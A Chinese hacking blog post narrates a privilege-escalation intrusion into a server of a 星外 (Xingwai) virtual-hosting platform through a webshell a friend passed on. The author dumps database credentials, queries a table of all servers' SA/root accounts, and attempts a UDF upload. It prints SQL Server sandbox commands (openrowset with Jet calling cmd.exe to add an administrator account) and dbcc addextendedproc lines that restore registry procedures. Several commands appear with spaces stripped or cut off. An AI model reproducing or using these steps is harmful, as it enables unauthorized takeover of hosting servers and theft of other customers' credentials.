星外主机提权的曲折过程

　　今天朋友丢了个星外主站的SHELL过来,不知他是怎么搞的，权限都设置得都NB什么组件都删光光了，只支持ASP汗的是全部没写入和修改权限，都不知道那Y是怎么拿到SHELL的。
　　不光是这样，他的马都有点问题，使用起来都不爽，
　　还好，在Global.asa找到了数据库连接文件，不是SA不过密码和SA的一样本想可以直接提权了，没想什么组件都删了，而且用这个SHELL不习惯
　　又执行不了命令，SHELL也没写入修改权限，头大，之后直接用SHELL自带的SQL连接一下
　　看看里面的表什么的，查了查
　　SELECT*FROM[FreeHost_Serversqllist]
　　这个表得到一些数据
　　

数据

　　他所有服务器的SAROOT账号包含本机的，这下好了，有戏，不过高兴了早一点，接着想UDF提权，不过没写入权限，晕怎么办，想了想，查他上机开通的主机看看，说不定他不是独立服务器。
　　SELECT*FROM[FreeHost_Product_Host]
　　

独立服务器

　　看了一下站不多，只有300多个仔细的找一下，找到同服务器的这下好了，星外主目录没写权限，我直接从FTP下手，找了个站用FTP传了UDF上去本以为就此搞定，结果郁闷了一下 UDF不能导出
　　我想应该是降权了在群里问了一下，好你星外的权限配置得比较BT没办法了
　　搞了1个多小时，没搞下郁闷
　　其实是我走了弯路了回想下记得可以用SA沙盘提权
　　就接着试不过什么xp_cmdshell等组件都删了
　　头疼百度YY一下找到了恢复XP_cmdshell的，不过执行一下不成功不知道为什么，后来才发现是马的问题
　　沙盘就没去看了，不过百度找到一个新方法
　　SA下不用恢复xp_cmdshell和xplog70.dll也执行命令
　　windows\system32\ias\ias.mdb','selectshell("cmd.exe/cnetuseradminadmin/add")')
　　select*fromopenrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','selectshell("cmd.exe/cnetlocalgroupadministratorsadmin/add")')
　　试了下不成在找到
　　dbccaddextendedproc('xp_regread','xpstar.dll')
　　dbccaddextendedproc('xp_regwrite','xpstar.dll')
　　恢复了一下，成功了这样提权成功
　　不过失误了一下在加管理组的时候
　　写错一点命令以为他管理级改了，忙活半天，才发现本人文采不好，写了半天发现上面的文字YY的我看得都头大了
　　

管理